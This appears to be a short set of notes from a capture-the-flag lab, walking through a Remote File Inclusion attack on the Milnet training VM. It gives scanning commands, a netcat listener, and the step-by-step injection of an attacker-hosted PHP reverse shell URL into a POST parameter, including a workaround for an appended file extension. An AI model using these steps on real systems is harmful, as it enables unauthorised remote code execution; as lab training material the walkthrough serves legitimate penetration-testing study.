<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>New Page</title>
</head><body>https://mrh4sh.github.io/milnet-solution<br/>
<br/>
<b>RFI (Remote File Inclusion)</b><div style="text-align: left"><span style="font-size: 14pt"><span style="font-family: proxima-nova"> (example VM: Milnet)</span></span></div><ul><li>Allows you to execute arbitrary code from a file on a remote server</li>
<li>This works because...</li>
<li>The vulnerable server is configured to allow it</li>
<li style="list-style-type: none"><ul><li>Check /info.php for</li>
<li><i>allowurlfopen</i> = on</li>
<li><i>allowurlinclude</i> = on</li>
</ul>
</li>
<li>The website is using an include statement</li>
<li>The website is configured to point to a file as input</li>
<li style="list-style-type: none"><ul><li>You see this with POST parameters</li>
</ul>
</li>
<li>Enumeration</li>
</ul>
:~/# nmap -A -T4 -p- [Target IP]<br/>
<ul><li>How do we find if the site is vulnerable?</li>
<li style="list-style-type: none"><ul><li>Look at the source code of the pages on target server</li>
<li>Web vulnerability scanners</li>
<li>Nikto</li>
<li style="list-style-type: none"><ul><li>nikto -h 192.168.219.156 &gt; Nikto.scan</li>
</ul>
</li>
<li>dirb (directory buster)</li>
</ul>
</li>
<li>Exploitation</li>
<li>Attacking tools that will help make this easy</li>
<li style="list-style-type: none"><ul><li>Hackbar (Firefox plugin)</li>
<li>Tamperdata (Firefox plugin)</li>
<li>BurpSuite</li>
</ul>
</li>
<li>Reverse Shell</li>
<li style="list-style-type: none"><ul><li>pentestmonkey php-reverse-shell</li>
<li>http://pentestmonkey.net/tools/web-shells/php-reverse-shell</li>
<li>Will be served up by web server</li>
<li>Apache</li>
<li>nginx</li>
</ul>
</li>
<li>Start Attack!</li>
<li style="list-style-type: none"><ul><li>Run Nikto scan</li>
<li>Possible RFI found through /info.php</li>
<li>Browse to http://192.168.219.156/info.php</li>
<li>Found</li>
<li style="list-style-type: none"><ul><li><i>allowurlfopen</i> = on</li>
<li><i>allowurlinclude</i> = on</li>
<li>Good info here :)</li>
</ul>
</li>
<li>Browse to main page</li>
<li>http://192.168.219.156</li>
<li style="list-style-type: none"><ul><li>Looks like there is a Navigation frame and a main page frame</li>
<li>Let's view source code of the main page</li>
<li style="list-style-type: none"><ul><li>Right-click &gt; view source</li>
<li>or</li>
<li>curl -v http://192.168.219.156</li>
</ul>
</li>
<li>Found web pages</li>
<li style="list-style-type: none"><ul><li>nav.php</li>
<li>main.php</li>
</ul>
</li>
<li>Following nav.php takes me to the Navigation page (w/o frame)</li>
<li>Following main.php take me to graphic for Milnet</li>
<li>More source code peeping</li>
<li style="list-style-type: none"><ul><li>curl -v http://192.168.219.156/nav.php</li>
<li>We've struck gold!</li>
<li>Looks like all links take you to the same page</li>
<li style="list-style-type: none"><ul><li>content.php</li>
</ul>
</li>
<li>It does this through HTTP POST method via the buttons on the nav.php page</li>
</ul>
</li>
<li>Prepare web server to serve up php-reverse-shell.php</li>
<li style="list-style-type: none"><ul><li>Download php-reverse-shell.php from pentestmonkey site</li>
<li>Copy to /var/www/html (or wherever your web-root is)</li>
<li>Make sure web server is started</li>
<li>~$ service apache2 restart</li>
</ul>
</li>
<li>Modify php-reverse-shell.php to work with your environment</li>
<li style="list-style-type: none"><ul><li>Change server IP and listening PORT to your netcat listener</li>
</ul>
</li>
<li>Start netcat listener to accept reverse shell connection</li>
<li style="list-style-type: none"><ul><li>nc -nlvp 9999</li>
</ul>
</li>
<li>Time to fire up Tamperdata/BurpSuite/Hackbar</li>
<li style="list-style-type: none"><ul><li>Start Tamper</li>
<li>Modify POST data</li>
<li>Clear existing POST data</li>
<li>Type in: http://192.168.219.146/php-reverse-shell.php</li>
<li>Press <b>OK</b></li>
<li>Looks like there's a problem. NO REVERSE SHELL!</li>
<li>Check apache access logs</li>
<li style="list-style-type: none"><ul><li>~$ tail /var/log/apache2/access.log</li>
<li>Log reads: GET /php-reverse-shell.php.php</li>
</ul>
</li>
<li>Target site is adding .php to our file making it invalid</li>
<li style="list-style-type: none"><ul><li>Fix by renaming file without the .php extension</li>
<li>~$ cp php-reverse-shell.php phpshell</li>
</ul>
</li>
<li>Run tamperdata again</li>
<li style="list-style-type: none"><ul><li>Still no reverse shell</li>
<li>Check apache log again</li>
<li style="list-style-type: none"><ul><li>GET request looks good now</li>
<li>My Apache server config may need tweaking</li>
</ul>
</li>
<li>Easy fix</li>
<li>Use python to create quick/dirty web server</li>
<li style="list-style-type: none"><ul><li>~$ python -m SimpleHTTPServer 8888</li>
<li>Make sure you're in the same dir as phpshell or you'll get File not Found</li>
</ul>
</li>
</ul>
</li>
<li>Run tamperdata again</li>
<li style="list-style-type: none"><ul><li>Change POST data to...</li>
<li>http://192.168.219.146:8888/phpshell</li>
<li>Welcome to SHELL :)</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ul>
</body></html>